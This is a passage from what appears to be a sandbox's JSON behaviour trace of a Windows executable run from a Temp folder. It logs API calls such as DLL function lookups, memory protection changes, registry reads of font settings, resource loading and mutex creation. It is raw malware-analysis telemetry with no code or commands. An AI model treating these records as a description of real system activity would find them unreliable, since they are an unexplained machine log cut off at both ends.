21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "CCEnableScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73da55c0" } ], "repeated": 0, "id": 949 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "QuerySystemGestureStatus" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73e31c20" } ], "repeated": 0, "id": 950 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73f20000" }, { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 951 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73f20000" }, { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 952 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000042" }, { "name": "uiParam", "value": "0x0000000c" } ], "repeated": 3, "id": 953 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "ModuleHandle", "value": "0x00400000" } ], "repeated": 0, "id": 954 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x0044aa35", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 0, "id": 955 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0041e32f", "parentcaller": "0x0046d4db", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" } ], "repeated": 0, "id": 956 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0041e34d", "parentcaller": "0x0046d4db", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.dll" }, { "name": "ModuleHandle", "value": "0x73910000" }, { "name": "FunctionName", "value": "InitCommonControlsEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7392e3e0" } ], "repeated": 0, "id": 957 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000068" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 958 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "|\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xc0\\xe7\\x19\\x00~\\xcaOv\\xb4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&\\x00'\\x00\\xc4Aav\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x98\\xd2\\x01\\x01\\x00\\xe8\\x19\\x00" } ], "repeated": 0, "id": 959 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000029c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 960 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000400", "arguments": [ { "name": "SystemMetricIndex", "value": "0" } ], "repeated": 0, "id": 961 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "misc", "api": "GetSystemMetrics", "status": true, "return": "0x00000300", "arguments": [ { "name": "SystemMetricIndex", "value": "1" } ], "repeated": 0, "id": 962 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000029" }, { "name": "uiParam", "value": "0x000001f4" } ], "repeated": 0, "id": 963 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000066" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 964 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" } ], "repeated": 0, "id": 965 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "user32" }, { "name": "BaseAddress", "value": "0x76610000" } ], "repeated": 0, "id": 966 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 967 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1e62c0e7345fc825586.exe" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1e62c0e7345fc825586.exe" } ], "repeated": 0, "id": 968 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x0044aa35", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 0, "id": 969 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" }, { "name": "Handle", "value": "0x0000029c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" } ], "repeated": 0, "id": 970 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000029c" }, { "name": "ValueName", "value": "MS Sans Serif" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Sans Serif" } ], "repeated": 0, "id": 971 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" } ], "repeated": 0, "id": 972 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x0044aa35", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 4, "id": 973 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "USER32" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 974 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "NotifyWinEvent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664f290" } ], "repeated": 0, "id": 975 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 976 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 977 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 978 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 979 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 980 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 981 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 982 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x00000294" }, { "name": "MutexName", "value": "Local\\SM0:7456:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 983 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000294" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 984 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 985 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 986 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 987 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000294" } ], "repeated": 1, "id": 988 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x00417ee8", "parentcaller": "0x00417e0e", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x004a5980", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#2" }, { "name": "Name", "value": "PREVIEWGLYPH" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 989 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x00417f02", "parentcaller": "0x00417e0e", "category": "misc", "api": "LoadResource", "status": true, "return": "0x004a7828", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5980" } ], "repeated": 0, "id": 990 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x00417f1c", "parentcaller": "0x00417e0e", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x000000e8", "arguments": [ { "name": "ModuleHandle", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5980" } ], "repeated": 0, "id": 991 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x00417f26", "parentcaller": "0x00417e0e", "category": "misc", "api": "LockResource", "status": true, "return": "0x004a7828", "arguments": [ { "name": "ResourceData", "value": "0x004a7828" } ], "repeated": 0, "id": 992 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a976000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 993 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0722d000" }, { "name": "RegionSize", "value": "0x00017000" }, { "name": "FreeType", "value": "0x00004000" } ], "repeated": 0, "id": 994 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0722d000" }, { "name": "RegionSize", "value": "0x00017000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 995 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x07245000" }, { "name": "RegionSize", "value": "0x00009000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 996 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0722d000" }, { "name": "RegionSize", "value": "0x00020000" }, { "name": "FreeType", "value": "0x00004000" } ], "repeated": 0, "id": 997 }, { "timestamp": "2025-03-02 21:32:33,451", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0722d000" }, { "name": "RegionSize", "value": "0x00020000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 998 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 999 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000029c" }, { "name": "DesiredAccess", "value": "0x00000109", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" } ], "repeated": 0, "id": 1000 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000101", "pretty_value": "KEY_QUERY_VALUE|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x0000029c" }, { "name": "ObjectAttributesName", "value": "Segoe UI" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Segoe UI" } ], "repeated": 0, "id": 1001 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" } ], "repeated": 0, "id": 1002 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 1003 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000042" }, { "name": "uiParam", "value": "0x0000000c" } ], "repeated": 1, "id": 1004 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x00411b9c", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 0, "id": 1005 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 1006 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000042" }, { "name": "uiParam", "value": "0x0000000c" } ], "repeated": 1, "id": 1007 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 1, "id": 1008 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000042" }, { "name": "uiParam", "value": "0x0000000c" } ], "repeated": 1, "id": 1009 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 3, "id": 1010 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00414abb", "parentcaller": "0x00414c7a", "category": "misc", "api": "FindResourceExA", "status": true, "return": "0x004a5b90", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "Type", "value": "#10" }, { "name": "Name", "value": "T__1226125832" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 1, "id": 1011 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00417f02", "parentcaller": "0x00417e0e", "category": "misc", "api": "LoadResource", "status": true, "return": "0x004e637c", "arguments": [ { "name": "Module", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b90" } ], "repeated": 0, "id": 1012 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00417f1c", "parentcaller": "0x00417e0e", "category": "misc", "api": "SizeofResource", "status": true, "return": "0x000001c6", "arguments": [ { "name": "ModuleHandle", "value": "0x00400000" }, { "name": "ResourceInfo", "value": "0x004a5b90" } ], "repeated": 0, "id": 1013 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00417f26", "parentcaller": "0x00417e0e", "category": "misc", "api": "LockResource", "status": true, "return": "0x004e637c", "arguments": [ { "name": "ResourceData", "value": "0x004e637c" } ], "repeated": 0, "id": 1014 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 4, "id": 1015 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0044ab18", "parentcaller": "0x0044aa35", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "ModuleHandle", "value": "0x00400000" } ], "repeated": 0, "id": 1016 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 3, "id": 1017 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00442004", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ControlOfs0040000000001DD0" }, { "name": "Atom", "value": "0x0000c087" } ], "repeated": 1, "id": 1018 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00462dc8", "parentcaller": "0x00462430", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "user32" }, { "name": "BaseAddress", "value": "0x76610000" } ], "repeated": 0, "id": 1019 }, { "timestamp": "2025-03-02 21:32:33,467", "thread_id": "7632", "caller": "0x00462dc8", "parentcaller": "0x00462430", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", 